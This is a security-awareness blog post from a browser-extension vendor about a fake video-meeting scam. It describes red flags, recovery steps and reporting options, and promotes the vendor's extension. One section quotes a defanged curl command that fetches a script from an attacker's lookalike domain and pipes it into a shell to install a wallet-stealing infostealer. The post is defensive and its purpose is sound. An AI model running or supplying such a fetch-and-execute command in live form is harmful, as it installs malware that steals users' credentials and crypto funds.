MALWARE ALERT

Fake meeting-link malware scam: the Zoom call that drains your wallet

Someone messages you to hop on a quick recording or interview and insists on their own video-call link. The page imitates StreamYard, Zoom or Teams, but it never opens a call. It shows a "copy and paste this command into Terminal" screen. The command pipes a remote script straight into your shell, which silently installs an infostealer that grabs your browser data, crypto wallet data, seed phrases and private keys.

SB

SafeBrowz Team Security ResearchJune 3, 202610 min read

What ZachXBT flagged

Here is what ZachXBT flagged:

The type of bs scammers post when sending malware to people on XChat.

(Account is compromised) pic.twitter.com/zP24u3QhWq

— ZachXBT (@zachxbt) June 3, 2026

The detail that makes this dangerous is in the parenthesis: the account is compromised. The lure does not always come from a stranger with a brand-new handle. It can come from a real person you follow, whose account was taken over, which is why the message can slip past the gut-check that normally protects you.

How the fake meeting-link scam works

The setup is social, not technical, and it follows a tight script. The DM arrives from a hijacked verified account with a large following, often a known crypto influencer whose account was taken over (the real owner is a victim too). Because the handle is real and verified, there is no impersonation to spot. The pitch is friendly and flattering: they want you on their podcast, an interview, or a quick "join us" recording call on X.

Here is the tell that separates this from a normal invite. When you offer your own link, a regular Google Meet on meet.google.com, they reject it. They insist you use their link instead, a fake StreamYard page on a lookalike domain such as streamyard.host01eu.com or streamyard.appstore.ms. The real StreamYard lives on streamyard.com, nowhere else. The exact lookalike domain varies across the campaign.

Then they push you onto a computer. If you say you are on your phone, they press: "what's the issue with joining from a PC?" That is not curiosity. The malware payload is a desktop infostealer, mostly aimed at macOS, so it needs you on a Mac or PC, not mobile.

The fake "join" page does not open a call. It shows a "Copy & Paste Command" screen with an instruction like "Copy & Paste this command into Terminal and press Enter." That single step is the entire attack, and the next section breaks it down.

The copy-paste command is the whole attack

This is a ClickFix-style attack, the same technique behind the fake CAPTCHA ClickFix pages. There is no installer to download, no dmg to open. The fake join page simply asks you to copy one line of text and paste it into Terminal (on a Mac) or the Run dialog or PowerShell (on Windows), then press Enter. The instant you do, that command runs with your account's full privileges.

The command is a curl one-liner that fetches a remote script and pipes it straight into your shell. Piping a download directly into a shell means the code executes the moment it arrives, with no chance to read it first. Here is a defanged version of what the campaign uses. It is broken on purpose so it cannot run:

Do NOT run this - defanged sample, not executable
curl -kfsSL hxxps://streamyard.appstore[.]ms/macos/installation | zsh

The hxxps and the [.] are deliberately broken so the line is inert, and the exact domain and command change from one victim to the next. What does not change is the shape: download a script, pipe it into a shell, run it instantly. In this campaign that script silently installs a macOS infostealer and wallet drainer that exfiltrates browser data, crypto wallet data, seed and mnemonic phrases, private keys, Telegram data and KeyChain data. The wallet draining follows minutes later. You never saw a call, because there was never a call.

The one tell that gives it away

Strip away every disguise and one fact defeats this entire scam:

A real video call, whether Zoom, Google Meet, Microsoft Teams or StreamYard, never asks you to paste a command into Terminal, the Run dialog, or PowerShell to join. The instant a "join" page shows a copy-paste command, it is malware.

When you join a legitimate call, the link opens your existing client or runs the meeting right in your browser tab. There is no command to copy, no Terminal to open, no shell step of any kind. Joining a video call is a click, never a paste. If a "meeting" ever tells you to copy something into Terminal, the Run box, or PowerShell to enter, that is the attack, not a glitch. Stop, and close the tab. The cure for the whole campaign is to join meetings only through software you already trust, never by running a command a meeting page hands you.

Red flags in a fake meeting-link DM

• The invite comes from a verified or known account that feels slightly off. A crypto influencer with tens of thousands of followers suddenly DMs you for a podcast or interview. The handle is real and verified, but the account may be hijacked. A verified badge does not make the link safe.
• They refuse your normal meeting platform and insist on their specific link. You offer a regular Google Meet, they reject it and push their own link instead. A genuine host has no reason to refuse a standard Meet or Zoom invite.
• They push you to join from a computer rather than your phone. "What's the issue with joining from a PC?" The desktop infostealer needs a Mac or PC, so being on mobile breaks the attack, which is exactly why they pressure you off it.
• The "join" page tells you to copy a command into Terminal. A real call is a click. The moment a join screen shows a "copy and paste this into Terminal and press Enter" instruction, it is malware. The same is true for a Run dialog or PowerShell command.
• The link sits on a lookalike domain. The address is a near-match, like streamyard.host01eu.com or streamyard.appstore.ms, not the real streamyard.com, zoom.us or meet.google.com.
• Urgency and pressure. "We go live in five minutes," "the guest before you ran over, jump in now." The rush is there to stop you checking the domain or thinking about that Terminal step.
• The message feels slightly off, even from someone you follow. Odd phrasing, an unusual ask, a tone that does not match the person. The account may be compromised. A trusted name does not make the command safe.

Why a message from a trusted contact can still be malware

The instinct that keeps most people safe is simple: trust messages from people you know. This scam is built to defeat exactly that. ZachXBT's note that "the account is compromised" is the whole point. When an attacker takes over a real account, the malicious DM arrives wearing a face you recognize. There is no misspelled handle, no stranger to be suspicious of, no impersonation to catch. It is genuinely your contact's account, just no longer in their hands.

That is why the rule has to be about the action, not the sender. It does not matter who appears to be asking. If any message, from anyone, leads to a meeting page that tells you to paste a command into Terminal, or that refuses your normal meeting link and insists on its own, the answer is no. Verify the person through a second channel before you act. A quick message on a different platform, or a call to a number you already had, costs nothing and breaks the scam. If you want to study how attackers research and target you first, our piece on spear phishing and LinkedIn profiling shows how the approach gets personalized, and the Telegram admin DM crypto scam covers the same trust-hijack on another platform.

The stakes are real. Attackers impersonating Andreessen Horowitz (a16z) set up a fake "podcast" meeting using a fake video-call app called Vortax and drained one victim of $245,000, according to ZachXBT. North Korean state-linked actors, tracked as part of the Lazarus group, ran fake Zoom and Teams meetings to steal more than $300 million. MetaMask security researcher Taylor Monahan has been tracking those losses. The Record (Recorded Future News), CoinJournal, crypto.news and CryptoSlate have all documented the playbook. The names and amounts change. The mechanism, a meeting page that asks you to install something, does not.

If you already ran the command

If you pasted that command into Terminal and pressed Enter, treat the device as compromised and move fast. The data harvest happens in seconds, and wallet draining follows.

1. Disconnect the device from the internet. Turn off Wi-Fi and unplug ethernet to cut the malware off from the attacker. Do not keep using the machine for anything sensitive.
2. Move your funds from a separate, clean device. Do not transfer from the infected machine. Use a different, trusted device, or a hardware wallet you know was never connected to it, to move assets to a fresh wallet whose seed phrase has never touched the infected computer.
3. Revoke token approvals. From the clean device, use a revoke tool to cancel any token approvals on wallets that may have been exposed, so a drainer cannot pull tokens later. Our guide on what to do when your seed phrase is stolen walks through this step by step.
4. Reset wallet credentials and assume the seed is burned. If a seed or private key sat on the infected device, consider it permanently exposed. Generate a new wallet on a clean device, never reuse the old seed, and migrate anything recoverable to the new address.
5. Change passwords for browser-stored and exposed accounts. The malware reads saved browser data and KeyChain data. From the clean device, change passwords on email, exchanges and anything important, and turn on app-based two-factor authentication everywhere.
6. Secure your messaging accounts. Telegram data is a target. Terminate other sessions, reset your Telegram login, and check that no extra devices are attached to your X account.
7. Wipe and reinstall the operating system on the infected device. Do not simply delete the file. A full clean reinstall is the only reliable way to be sure the stealer and any persistence are gone.

How to report it

• Report to the FBI Internet Crime Complaint Center at ic3.gov. File a report with the wallet addresses, the malicious link and the timeline if you lost funds or had a device compromised.
• Report the account on the platform. If the DM came from a compromised X or Telegram account, report it so the platform can act and warn the real owner.
• Warn the real person. If you recognized the sender, reach them through a different channel. Their account is likely compromised and being used to hit their other contacts.
• Flag the malicious domain. Reporting the lookalike meeting domain to threat-intelligence feeds helps get the page taken down and protects the next target.

Where browser-layer defense fits

A DM filter cannot tell a genuine meeting invite from a poisoned one, and the lookalike link can look almost right. The damage starts one click later, on the fake meeting page that tells you to paste a command into Terminal. Browser-layer scanning is built for exactly that moment. When a StreamYard, Zoom or Teams-styled page renders on a domain that is not the real one, a brand-aware scanner flags the impersonation before you ever reach the copy-paste command screen. SafeBrowz is a free extension for Chrome, Firefox and Edge (Safari coming soon) that checks every URL before it renders against a 550+ brand database. Install SafeBrowz and pair it with the one rule that beats this campaign: join meetings only through software you already have, and never paste a command a meeting page hands you. The same "run this to continue" trick drives the fake CAPTCHA ClickFix attack, and our breakdown of the fake Chrome update phishing scam shows how lookalike pages push malware elsewhere.

Install SafeBrowz free

Add the browser extension that runs every check in this article automatically, on every page, before it renders. Free forever, with optional Premium AI deep scan at $14.99 per year.

Add to Chrome Add to Firefox Add to Edge

See pricing and Premium features

Frequently asked questions

How does the fake meeting-link malware scam work?

A DM arrives from a hijacked verified account with a large following, often a crypto influencer, inviting you to a podcast or interview. When you offer a normal Google Meet, they reject it and insist on their own link, a fake StreamYard page on a lookalike domain like streamyard.host01eu.com. They push you to join from a computer rather than your phone. The "join" page never opens a call. It tells you to copy and paste a command into Terminal and press Enter. That command pipes a remote script into your shell, which silently installs a macOS infostealer that steals browser data, crypto wallet data, seed phrases, private keys, Telegram data and KeyChain data.

How do I tell a real meeting link from a fake one?

A real Zoom, Teams, StreamYard or Google Meet call opens in your browser or your already-installed app. It never asks you to paste a command into Terminal, the Run dialog, or PowerShell to join. Check the domain too: real meetings live on streamyard.com, zoom.us, meet.google.com or teams.microsoft.com, not on a lookalike like streamyard.host01eu.com or streamyard.appstore.ms. The instant a join page shows a copy-paste command, it is malware.

The DM came from someone I know. Can it still be malware?

Yes. ZachXBT flagged that these messages often come from a compromised, verified account with a large following, so the lure can appear to be from someone you trust. There is no misspelled handle to spot because it really is your contact's account, just taken over. Judge the action, not the sender: if any message refuses your normal meeting link, insists on its own, or leads to a page that tells you to paste a command into Terminal, do not act. Verify the person through a second channel first.

How much have people lost to this scam?

A fake video-call app called Vortax, used by attackers impersonating Andreessen Horowitz (a16z) for a fake podcast meeting, drained one victim of $245,000, according to ZachXBT. North Korean state-linked actors tracked as part of the Lazarus group used fake Zoom and Teams meetings to steal more than $300 million. MetaMask security researcher Taylor Monahan has been tracking the losses.

I pasted the command into Terminal. What do I do first?

Treat the device as compromised. Disconnect it from the internet, then from a separate clean device move your funds to a fresh wallet whose seed has never touched the infected machine, revoke token approvals, and reset wallet credentials. Change passwords on browser-stored and exposed accounts, secure your Telegram and X sessions, and do a full operating-system reinstall on the infected device rather than just deleting a file. Report the incident to the FBI at ic3.gov.

How do I report a fake meeting-link scam?

In the US, file a report with the FBI Internet Crime Complaint Center at ic3.gov, with the wallet addresses, the malicious link and the timeline if you lost funds. Report the compromised account on X or Telegram so the platform can act, warn the real owner through a different channel, and flag the malicious meeting domain to threat-intelligence feeds so the page can be taken down.

Related SafeBrowz coverage

• Deepfake Zoom CEO video fraud: the fake call that authorizes transfers
• What are crypto wallet drainers: the 2026 guide
• Crypto seed phrase stolen: what to do right now
• Telegram admin DM crypto scam: the fake support trap
• Fake Chrome update phishing scam: the "your browser is out of date" trick
• Fake CAPTCHA ClickFix: the "verify you are human" malware paste
• Spear phishing and LinkedIn profiling: how attackers target you
• Fake remote job laptop deposit scam (2026)
• Angler phishing: the fake support account that hijacks your reply

Bottom line: A meeting invite is not a threat. A meeting page that tells you to paste a command into Terminal is. If a DM, even from a verified name you trust, refuses your normal meeting link, insists on its own, and lands you on a "copy and paste this command" page, close it. Join calls only through software you already have, verify the person on a second channel, and put SafeBrowz on your browser so the fake meeting page is flagged before you ever reach the command screen.